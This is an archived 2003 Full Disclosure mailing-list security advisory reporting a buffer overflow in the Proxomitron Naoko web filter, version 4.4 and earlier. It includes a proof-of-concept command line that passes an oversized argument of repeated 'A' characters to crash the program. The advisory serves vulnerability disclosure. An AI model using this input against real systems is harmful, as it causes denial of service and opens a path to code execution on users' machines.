Full Disclosure mailing list archives
[SCSA-005] Proxomitron Naoko Long Path Buffer Overflow/DoS
From: Grégory Le Bras | Security Corporation <gregory.lebras () security-corp org>
Date: Wed, 19 Feb 2003 21:21:43 +0100
.: Proxomitron Naoko Long Path Buffer Overflow/DoS :. ________________________________________________________________________ Security Corporation Security Advisory [SCSA-005] ________________________________________________________________________ PROGRAM: The Proxomitron Naoko HOMEPAGE: http://www.proxomitron.org/ VULNERABLE VERSIONS: 4.4 and prior ________________________________________________________________________ DESCRIPTION ________________________________________________________________________ The Proxomitron is an Universal Web Filter. (direct quote from Proxomitron website) DETAILS & EXPLOITS ________________________________________________________________________ Sending a parameter with a buffer of 1024 bytes in length or more, causes Proxomitron Naoko to crash. This vulnerability can be easily exploited to execute code. Exploitation example : c:\Proxomitron>proxomitron AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAA SOLUTIONS ________________________________________________________________________ No solution for the moment. VENDOR STATUS ________________________________________________________________________ The vendor has reportedly been notified LINKS ________________________________________________________________________ French Version : http://www.security-corp.org/advisories/SCSA-005-FR.txt ------------------------------------------------------------ Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org ------------------------------------------------------------ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- [SCSA-005] Proxomitron Naoko Long Path Buffer Overflow/DoS Grégory Le Bras | Security Corporation (Feb 19)
- Re: [SCSA-005] Proxomitron Naoko Long Path Buffer Overflow/DoS Knud Erik Højgaard (Feb 19)